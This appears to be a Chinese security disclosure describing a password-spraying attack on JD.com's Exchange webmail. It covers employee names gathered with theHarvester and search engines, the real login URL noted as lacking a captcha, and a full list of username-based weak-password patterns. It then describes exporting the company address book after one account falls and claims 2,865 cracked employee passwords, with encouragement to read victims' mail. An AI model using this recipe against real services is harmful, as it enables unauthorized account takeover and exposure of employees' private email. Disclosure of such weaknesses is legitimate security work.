#1 描述
2011年,互联网泄密事件引爆了整个信息安全界,导致传统的用户+密码认证的方式已无法满足现有安全需求。泄露数据包括:天涯:31,758,468条,CSDN:6,428,559条,微博:4,442,915条,人人网:4,445,047条,猫扑:2,644,726条,178:9,072,819条,嘟嘟牛:13,891,418条,7K7K:18,282,404条,共1.2亿条。
同时,搜索引擎越来越多的收录了企业的相关信息;
#2 风险描述
通过theharvester工具,和baidu.com、google.com搜索引擎,收集所有关于京东商城的员工信息。
得到如下京东商城员工列表信息:
#3 找到可用的登陆接口验证口令
https://mail.jd.com/owa/auth/logon.aspx
京东的邮件服务使用了微软的Microsoft Exchange套件,无验证码限制,直接FUZZ。
#4 FUZZ规则建立
大公司人员的习惯研究,公司做得越来越大的时候,总会出现那么几个安全意识薄弱的人员(俗称猪一样的队友),他们往往会做出一些让人无法理解的事情,比如:直接点击邮件内的 EXE 附件,或者使用和用户名一样的密码,或者用户名+当前年份的密码。
我构建的密码规则:
%username% = 用户名
%domain% = 公司域名
%username%%domain%
%username%1
%username%12
%username%123
%username%1234
%username%12345
%username%123456
%username%@123
%username%@123.com
%username%@163
%username%@163.com
%username%163
%username%8
%username%88
%username%888
%username%999
%username%666
%username%2008
%username%2009
%username%2010
%username%2011
%username%2012
%username%2013
%username%@2008
%username%@2009
%username%@2010
%username%@2011
%username%@2012
%username%@2013
%username%!@#
#5 成功Fuzz出某个用户的密码,再结合Exchange的通讯录功能,导出所有用户名列表
! 京东原CFO,首席财务官
! 若干人员
推荐一个自动导出所有Exchange联系人的工具:Exchange-Spigot
http://exchangespigot.codeplex.com/
#6 是的,现阶段,你已经拥有了所以京东员工的联系信息列表
重复使用#4提到的FUZZ规则,弱口令用户一堆一堆的,然后你就可以进入那些人的邮箱里面找猛料了,这里只是测试,没办法提供相关结果信息。
测试后回显成功找到了2865名员工的密码,均为弱口令!